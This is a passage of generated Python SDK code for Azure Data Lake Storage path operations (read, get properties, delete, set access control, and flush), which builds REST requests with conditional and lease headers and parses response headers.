        _if_none_match = modified_access_conditions.if_none_match
        _if_modified_since = modified_access_conditions.if_modified_since
        _if_unmodified_since = modified_access_conditions.if_unmodified_since
    accept = "application/json"

    # Construct URL
    url = self.read.metadata['url']  # type: ignore
    path_format_arguments = {
        'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}  # type: Dict[str, Any]
    if timeout is not None:
        query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)

    # Construct headers
    header_parameters = {}  # type: Dict[str, Any]
    if request_id_parameter is not None:
        header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
    header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
    if range is not None:
        header_parameters['Range'] = self._serialize.header("range", range, 'str')
    if _lease_id is not None:
        header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
    if x_ms_range_get_content_md5 is not None:
        header_parameters['x-ms-range-get-content-md5'] = self._serialize.header("x_ms_range_get_content_md5", x_ms_range_get_content_md5, 'bool')
    if _if_match is not None:
        header_parameters['If-Match'] = self._serialize.header("if_match", _if_match, 'str')
    if _if_none_match is not None:
        header_parameters['If-None-Match'] = self._serialize.header("if_none_match", _if_none_match, 'str')
    if _if_modified_since is not None:
        header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
    if _if_unmodified_since is not None:
        header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    request = self._client.get(url, query_parameters, header_parameters)
    # stream=True: the body is not buffered by the pipeline; it is exposed
    # below via response.stream_download for the caller to consume lazily.
    pipeline_response = self._client._pipeline.run(request, stream=True, **kwargs)
    response = pipeline_response.http_response

    # 200 = whole file, 206 = partial content (Range request honored).
    if response.status_code not in [200, 206]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(_models.StorageError, response)
        raise HttpResponseError(response=response, model=error)

    response_headers = {}
    if response.status_code == 200:
        response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges'))
        response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control'))
        response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition'))
        response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding'))
        response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language'))
        response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length'))
        response_headers['Content-Range']=self._deserialize('str', response.headers.get('Content-Range'))
        response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type'))
        response_headers['Content-MD5']=self._deserialize('str', response.headers.get('Content-MD5'))
        response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
        response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
        response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
        response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
        response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
        response_headers['x-ms-resource-type']=self._deserialize('str', response.headers.get('x-ms-resource-type'))
        response_headers['x-ms-properties']=self._deserialize('str', response.headers.get('x-ms-properties'))
        response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration'))
        response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state'))
        response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status'))
        deserialized = response.stream_download(self._client._pipeline)

    if response.status_code == 206:
        response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges'))
        response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control'))
        response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition'))
        response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding'))
        response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language'))
        response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length'))
        response_headers['Content-Range']=self._deserialize('str', response.headers.get('Content-Range'))
        response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type'))
        response_headers['Content-MD5']=self._deserialize('str', response.headers.get('Content-MD5'))
        response_headers['x-ms-content-md5']=self._deserialize('str', response.headers.get('x-ms-content-md5'))
        response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
        response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
        response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
        response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
        response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
        response_headers['x-ms-resource-type']=self._deserialize('str', response.headers.get('x-ms-resource-type'))
        response_headers['x-ms-properties']=self._deserialize('str', response.headers.get('x-ms-properties'))
        response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration'))
        response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state'))
        response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status'))
        deserialized = response.stream_download(self._client._pipeline)

    if cls:
        return cls(pipeline_response, deserialized, response_headers)

    return deserialized
read.metadata = {'url': '/{filesystem}/{path}'}  # type: ignore
def get_properties(
    self,
    request_id_parameter=None,  # type: Optional[str]
    timeout=None,  # type: Optional[int]
    action=None,  # type: Optional[Union[str, "_models.PathGetPropertiesAction"]]
    upn=None,  # type: Optional[bool]
    lease_access_conditions=None,  # type: Optional["_models.LeaseAccessConditions"]
    modified_access_conditions=None,  # type: Optional["_models.ModifiedAccessConditions"]
    **kwargs  # type: Any
):
    # type: (...) -> None
    """Get Properties | Get Status | Get Access Control List.

    Get Properties returns all system and user defined properties for a path. Get Status returns
    all system defined properties for a path. Get Access Control List returns the access control
    list for a path. This operation supports conditional HTTP requests. For more information, see
    `Specifying Conditional Headers for Blob Service Operations <https://docs.microsoft.com/en-
    us/rest/api/storageservices/specifying-conditional-headers-for-blob-service-operations>`_.

    :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
     limit that is recorded in the analytics logs when storage analytics logging is enabled.
    :type request_id_parameter: str
    :param timeout: The timeout parameter is expressed in seconds. For more information, see
     :code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
     timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
    :type timeout: int
    :param action: Optional. If the value is "getStatus" only the system defined properties for the
     path are returned. If the value is "getAccessControl" the access control list is returned in
     the response headers (Hierarchical Namespace must be enabled for the account), otherwise the
     properties are returned.
    :type action: str or ~azure.storage.filedatalake.models.PathGetPropertiesAction
    :param upn: Optional. Valid only when Hierarchical Namespace is enabled for the account. If
     "true", the user identity values returned in the x-ms-owner, x-ms-group, and x-ms-acl response
     headers will be transformed from Azure Active Directory Object IDs to User Principal Names. If
     "false", the values will be returned as Azure Active Directory Object IDs. The default value is
     false. Note that group and application Object IDs are not translated because they do not have
     unique friendly names.
    :type upn: bool
    :param lease_access_conditions: Parameter group.
    :type lease_access_conditions: ~azure.storage.filedatalake.models.LeaseAccessConditions
    :param modified_access_conditions: Parameter group.
    :type modified_access_conditions: ~azure.storage.filedatalake.models.ModifiedAccessConditions
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    # Map well-known HTTP status codes to typed azure-core exceptions; callers
    # may override/extend the mapping via the 'error_map' kwarg.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))

    # Flatten the optional parameter-group models into the individual values
    # used to build conditional request headers below.
    _lease_id = None
    _if_match = None
    _if_none_match = None
    _if_modified_since = None
    _if_unmodified_since = None
    if lease_access_conditions is not None:
        _lease_id = lease_access_conditions.lease_id
    if modified_access_conditions is not None:
        _if_match = modified_access_conditions.if_match
        _if_none_match = modified_access_conditions.if_none_match
        _if_modified_since = modified_access_conditions.if_modified_since
        _if_unmodified_since = modified_access_conditions.if_unmodified_since
    accept = "application/json"

    # Construct URL from the operation's metadata template ('/{filesystem}/{path}').
    url = self.get_properties.metadata['url']  # type: ignore
    path_format_arguments = {
        'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct query parameters (only those the caller supplied).
    query_parameters = {}  # type: Dict[str, Any]
    if timeout is not None:
        query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
    if action is not None:
        query_parameters['action'] = self._serialize.query("action", action, 'str')
    if upn is not None:
        query_parameters['upn'] = self._serialize.query("upn", upn, 'bool')

    # Construct request headers, including lease and conditional-access headers.
    header_parameters = {}  # type: Dict[str, Any]
    if request_id_parameter is not None:
        header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
    header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
    if _lease_id is not None:
        header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
    if _if_match is not None:
        header_parameters['If-Match'] = self._serialize.header("if_match", _if_match, 'str')
    if _if_none_match is not None:
        header_parameters['If-None-Match'] = self._serialize.header("if_none_match", _if_none_match, 'str')
    if _if_modified_since is not None:
        header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
    if _if_unmodified_since is not None:
        header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    # Properties are returned entirely in response headers, so this is a HEAD request.
    request = self._client.head(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(_models.StorageError, response)
        raise HttpResponseError(response=response, model=error)

    # Deserialize every documented response header; absent headers deserialize to None.
    response_headers = {}
    response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges'))
    response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control'))
    response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition'))
    response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding'))
    response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language'))
    response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length'))
    response_headers['Content-Range']=self._deserialize('str', response.headers.get('Content-Range'))
    response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type'))
    response_headers['Content-MD5']=self._deserialize('str', response.headers.get('Content-MD5'))
    response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
    response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
    response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
    response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
    response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
    response_headers['x-ms-resource-type']=self._deserialize('str', response.headers.get('x-ms-resource-type'))
    response_headers['x-ms-properties']=self._deserialize('str', response.headers.get('x-ms-properties'))
    response_headers['x-ms-owner']=self._deserialize('str', response.headers.get('x-ms-owner'))
    response_headers['x-ms-group']=self._deserialize('str', response.headers.get('x-ms-group'))
    response_headers['x-ms-permissions']=self._deserialize('str', response.headers.get('x-ms-permissions'))
    response_headers['x-ms-acl']=self._deserialize('str', response.headers.get('x-ms-acl'))
    response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration'))
    response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state'))
    response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status'))

    if cls:
        return cls(pipeline_response, None, response_headers)

get_properties.metadata = {'url': '/{filesystem}/{path}'}  # type: ignore
def delete(
    self,
    request_id_parameter=None,  # type: Optional[str]
    timeout=None,  # type: Optional[int]
    recursive=None,  # type: Optional[bool]
    continuation=None,  # type: Optional[str]
    lease_access_conditions=None,  # type: Optional["_models.LeaseAccessConditions"]
    modified_access_conditions=None,  # type: Optional["_models.ModifiedAccessConditions"]
    **kwargs  # type: Any
):
    # type: (...) -> None
    """Delete File | Delete Directory.

    Delete the file or directory. This operation supports conditional HTTP requests. For more
    information, see `Specifying Conditional Headers for Blob Service Operations
    <https://docs.microsoft.com/en-us/rest/api/storageservices/specifying-conditional-headers-for-
    blob-service-operations>`_.

    :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
     limit that is recorded in the analytics logs when storage analytics logging is enabled.
    :type request_id_parameter: str
    :param timeout: The timeout parameter is expressed in seconds. For more information, see
     :code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
     timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
    :type timeout: int
    :param recursive: Required.
    :type recursive: bool
    :param continuation: Optional. When deleting a directory, the number of paths that are deleted
     with each invocation is limited. If the number of paths to be deleted exceeds this limit, a
     continuation token is returned in this response header. When a continuation token is returned
     in the response, it must be specified in a subsequent invocation of the delete operation to
     continue deleting the directory.
    :type continuation: str
    :param lease_access_conditions: Parameter group.
    :type lease_access_conditions: ~azure.storage.filedatalake.models.LeaseAccessConditions
    :param modified_access_conditions: Parameter group.
    :type modified_access_conditions: ~azure.storage.filedatalake.models.ModifiedAccessConditions
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    # Map well-known HTTP status codes to typed azure-core exceptions; callers
    # may override/extend the mapping via the 'error_map' kwarg.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))

    # Flatten the optional parameter-group models into the individual values
    # used to build conditional request headers below.
    _lease_id = None
    _if_match = None
    _if_none_match = None
    _if_modified_since = None
    _if_unmodified_since = None
    if lease_access_conditions is not None:
        _lease_id = lease_access_conditions.lease_id
    if modified_access_conditions is not None:
        _if_match = modified_access_conditions.if_match
        _if_none_match = modified_access_conditions.if_none_match
        _if_modified_since = modified_access_conditions.if_modified_since
        _if_unmodified_since = modified_access_conditions.if_unmodified_since
    accept = "application/json"

    # Construct URL from the operation's metadata template ('/{filesystem}/{path}').
    url = self.delete.metadata['url']  # type: ignore
    path_format_arguments = {
        'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct query parameters (only those the caller supplied).
    query_parameters = {}  # type: Dict[str, Any]
    if timeout is not None:
        query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
    if recursive is not None:
        query_parameters['recursive'] = self._serialize.query("recursive", recursive, 'bool')
    if continuation is not None:
        query_parameters['continuation'] = self._serialize.query("continuation", continuation, 'str')

    # Construct request headers, including lease and conditional-access headers.
    header_parameters = {}  # type: Dict[str, Any]
    if request_id_parameter is not None:
        header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
    header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
    if _lease_id is not None:
        header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
    if _if_match is not None:
        header_parameters['If-Match'] = self._serialize.header("if_match", _if_match, 'str')
    if _if_none_match is not None:
        header_parameters['If-None-Match'] = self._serialize.header("if_none_match", _if_none_match, 'str')
    if _if_modified_since is not None:
        header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
    if _if_unmodified_since is not None:
        header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    request = self._client.delete(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(_models.StorageError, response)
        raise HttpResponseError(response=response, model=error)

    # x-ms-continuation (if present) must be passed back in a follow-up delete
    # call to continue deleting a large directory.
    response_headers = {}
    response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
    response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
    response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
    response_headers['x-ms-continuation']=self._deserialize('str', response.headers.get('x-ms-continuation'))

    if cls:
        return cls(pipeline_response, None, response_headers)

delete.metadata = {'url': '/{filesystem}/{path}'}  # type: ignore
def set_access_control(
    self,
    timeout=None,  # type: Optional[int]
    owner=None,  # type: Optional[str]
    group=None,  # type: Optional[str]
    permissions=None,  # type: Optional[str]
    acl=None,  # type: Optional[str]
    request_id_parameter=None,  # type: Optional[str]
    lease_access_conditions=None,  # type: Optional["_models.LeaseAccessConditions"]
    modified_access_conditions=None,  # type: Optional["_models.ModifiedAccessConditions"]
    **kwargs  # type: Any
):
    # type: (...) -> None
    """Set the owner, group, permissions, or access control list for a path.

    :param timeout: The timeout parameter is expressed in seconds. For more information, see
     :code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
     timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
    :type timeout: int
    :param owner: Optional. The owner of the blob or directory.
    :type owner: str
    :param group: Optional. The owning group of the blob or directory.
    :type group: str
    :param permissions: Optional and only valid if Hierarchical Namespace is enabled for the
     account. Sets POSIX access permissions for the file owner, the file owning group, and others.
     Each class may be granted read, write, or execute permission. The sticky bit is also
     supported. Both symbolic (rwxrw-rw-) and 4-digit octal notation (e.g. 0766) are supported.
    :type permissions: str
    :param acl: Sets POSIX access control rights on files and directories. The value is a comma-
     separated list of access control entries. Each access control entry (ACE) consists of a scope,
     a type, a user or group identifier, and permissions in the format
     "[scope:][type]:[id]:[permissions]".
    :type acl: str
    :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
     limit that is recorded in the analytics logs when storage analytics logging is enabled.
    :type request_id_parameter: str
    :param lease_access_conditions: Parameter group.
    :type lease_access_conditions: ~azure.storage.filedatalake.models.LeaseAccessConditions
    :param modified_access_conditions: Parameter group.
    :type modified_access_conditions: ~azure.storage.filedatalake.models.ModifiedAccessConditions
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    # Map well-known HTTP status codes to typed azure-core exceptions; callers
    # may override/extend the mapping via the 'error_map' kwarg.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))

    # Flatten the optional parameter-group models into the individual values
    # used to build conditional request headers below.
    _lease_id = None
    _if_match = None
    _if_none_match = None
    _if_modified_since = None
    _if_unmodified_since = None
    if lease_access_conditions is not None:
        _lease_id = lease_access_conditions.lease_id
    if modified_access_conditions is not None:
        _if_match = modified_access_conditions.if_match
        _if_none_match = modified_access_conditions.if_none_match
        _if_modified_since = modified_access_conditions.if_modified_since
        _if_unmodified_since = modified_access_conditions.if_unmodified_since
    # Constant query value selecting this operation on the shared PATCH endpoint.
    action = "setAccessControl"
    accept = "application/json"

    # Construct URL from the operation's metadata template ('/{filesystem}/{path}').
    url = self.set_access_control.metadata['url']  # type: ignore
    path_format_arguments = {
        'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct query parameters; 'action' is always sent.
    query_parameters = {}  # type: Dict[str, Any]
    query_parameters['action'] = self._serialize.query("action", action, 'str')
    if timeout is not None:
        query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)

    # Construct request headers; owner/group/permissions/acl travel as headers.
    header_parameters = {}  # type: Dict[str, Any]
    if _lease_id is not None:
        header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
    if owner is not None:
        header_parameters['x-ms-owner'] = self._serialize.header("owner", owner, 'str')
    if group is not None:
        header_parameters['x-ms-group'] = self._serialize.header("group", group, 'str')
    if permissions is not None:
        header_parameters['x-ms-permissions'] = self._serialize.header("permissions", permissions, 'str')
    if acl is not None:
        header_parameters['x-ms-acl'] = self._serialize.header("acl", acl, 'str')
    if _if_match is not None:
        header_parameters['If-Match'] = self._serialize.header("if_match", _if_match, 'str')
    if _if_none_match is not None:
        header_parameters['If-None-Match'] = self._serialize.header("if_none_match", _if_none_match, 'str')
    if _if_modified_since is not None:
        header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
    if _if_unmodified_since is not None:
        header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
    if request_id_parameter is not None:
        header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
    header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    request = self._client.patch(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(_models.StorageError, response)
        raise HttpResponseError(response=response, model=error)

    response_headers = {}
    response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
    response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
    response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
    response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
    response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
    response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))

    if cls:
        return cls(pipeline_response, None, response_headers)

set_access_control.metadata = {'url': '/{filesystem}/{path}'}  # type: ignore
def set_access_control_recursive(
    self,
    mode,  # type: Union[str, "_models.PathSetAccessControlRecursiveMode"]
    timeout=None,  # type: Optional[int]
    continuation=None,  # type: Optional[str]
    force_flag=None,  # type: Optional[bool]
    max_records=None,  # type: Optional[int]
    acl=None,  # type: Optional[str]
    request_id_parameter=None,  # type: Optional[str]
    **kwargs  # type: Any
):
    # type: (...) -> "_models.SetAccessControlRecursiveResponse"
    """Set the access control list for a path and subpaths.

    :param mode: Mode "set" sets POSIX access control rights on files and directories, "modify"
     modifies one or more POSIX access control rights that pre-exist on files and directories,
     "remove" removes one or more POSIX access control rights that were present earlier on files
     and directories.
    :type mode: str or ~azure.storage.filedatalake.models.PathSetAccessControlRecursiveMode
    :param timeout: The timeout parameter is expressed in seconds. For more information, see
     :code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
     timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
    :type timeout: int
    :param continuation: Optional. When deleting a directory, the number of paths that are deleted
     with each invocation is limited. If the number of paths to be deleted exceeds this limit, a
     continuation token is returned in this response header. When a continuation token is returned
     in the response, it must be specified in a subsequent invocation of the delete operation to
     continue deleting the directory.
    :type continuation: str
    :param force_flag: Optional. Valid for "SetAccessControlRecursive" operation. If set to false,
     the operation will terminate quickly on encountering user errors (4XX). If true, the operation
     will ignore user errors and proceed with the operation on other sub-entities of the directory.
     Continuation token will only be returned when forceFlag is true in case of user errors. If not
     set the default value is false for this.
    :type force_flag: bool
    :param max_records: Optional. It specifies the maximum number of files or directories on which
     the acl change will be applied. If omitted or greater than 2,000, the request will process up
     to 2,000 items.
    :type max_records: int
    :param acl: Sets POSIX access control rights on files and directories. The value is a comma-
     separated list of access control entries. Each access control entry (ACE) consists of a scope,
     a type, a user or group identifier, and permissions in the format
     "[scope:][type]:[id]:[permissions]".
    :type acl: str
    :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
     limit that is recorded in the analytics logs when storage analytics logging is enabled.
    :type request_id_parameter: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: SetAccessControlRecursiveResponse, or the result of cls(response)
    :rtype: ~azure.storage.filedatalake.models.SetAccessControlRecursiveResponse
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.SetAccessControlRecursiveResponse"]
    # Map well-known HTTP status codes to typed azure-core exceptions; callers
    # may override/extend the mapping via the 'error_map' kwarg.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    # Constant query value selecting this operation on the shared PATCH endpoint.
    action = "setAccessControlRecursive"
    accept = "application/json"

    # Construct URL from the operation's metadata template ('/{filesystem}/{path}').
    url = self.set_access_control_recursive.metadata['url']  # type: ignore
    path_format_arguments = {
        'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct query parameters; 'action' and 'mode' are always sent.
    query_parameters = {}  # type: Dict[str, Any]
    query_parameters['action'] = self._serialize.query("action", action, 'str')
    if timeout is not None:
        query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
    if continuation is not None:
        query_parameters['continuation'] = self._serialize.query("continuation", continuation, 'str')
    query_parameters['mode'] = self._serialize.query("mode", mode, 'str')
    if force_flag is not None:
        query_parameters['forceFlag'] = self._serialize.query("force_flag", force_flag, 'bool')
    if max_records is not None:
        query_parameters['maxRecords'] = self._serialize.query("max_records", max_records, 'int', minimum=1)

    # Construct request headers.
    header_parameters = {}  # type: Dict[str, Any]
    if acl is not None:
        header_parameters['x-ms-acl'] = self._serialize.header("acl", acl, 'str')
    if request_id_parameter is not None:
        header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
    header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    request = self._client.patch(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(_models.StorageError, response)
        raise HttpResponseError(response=response, model=error)

    # x-ms-continuation (if present) must be passed back to continue applying
    # the ACL change across the remaining sub-paths.
    response_headers = {}
    response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
    response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
    response_headers['x-ms-continuation']=self._deserialize('str', response.headers.get('x-ms-continuation'))
    response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
    response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))

    # Unlike the other PATCH operations here, this one also carries a JSON body.
    deserialized = self._deserialize('SetAccessControlRecursiveResponse', pipeline_response)

    if cls:
        return cls(pipeline_response, deserialized, response_headers)

    return deserialized

set_access_control_recursive.metadata = {'url': '/{filesystem}/{path}'}  # type: ignore
def flush_data(
    self,
    timeout=None,  # type: Optional[int]
    position=None,  # type: Optional[int]
    retain_uncommitted_data=None,  # type: Optional[bool]
    close=None,  # type: Optional[bool]
    content_length=None,  # type: Optional[int]
    request_id_parameter=None,  # type: Optional[str]
    path_http_headers=None,  # type: Optional["_models.PathHTTPHeaders"]
    lease_access_conditions=None,  # type: Optional["_models.LeaseAccessConditions"]
    modified_access_conditions=None,  # type: Optional["_models.ModifiedAccessConditions"]
    **kwargs  # type: Any
):
    # type: (...) -> None
    """Flush (commit) previously uploaded data to the file.

    Sends a PATCH request with ``action=flush``. (The original generated summary —
    "Set the owner, group, permissions, or access control list for a path." — was a
    copy of ``set_access_control``'s description and did not match this operation.)

    :param timeout: The timeout parameter is expressed in seconds. For more information, see
     :code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
     timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
    :type timeout: int
    :param position: This parameter allows the caller to upload data in parallel and control the
     order in which it is appended to the file. It is required when uploading data to be appended
     to the file and when flushing previously uploaded data to the file. The value must be the
     position where the data is to be appended. Uploaded data is not immediately flushed, or
     written, to the file. To flush, the previously uploaded data must be contiguous, the position
     parameter must be specified and equal to the length of the file after all data has been
     written, and there must not be a request entity body included with the request.
    :type position: long
    :param retain_uncommitted_data: Valid only for flush operations. If "true", uncommitted data
     is retained after the flush operation completes; otherwise, the uncommitted data is deleted
     after the flush operation. The default is false. Data at offsets less than the specified
     position are written to the file when flush succeeds, but this optional parameter allows data
     after the flush position to be retained for a future flush operation.
    :type retain_uncommitted_data: bool
    :param close: Azure Storage Events allow applications to receive notifications when files
     change. When Azure Storage Events are enabled, a file changed event is raised. This event has a
     property indicating whether this is the final change to distinguish the difference between an
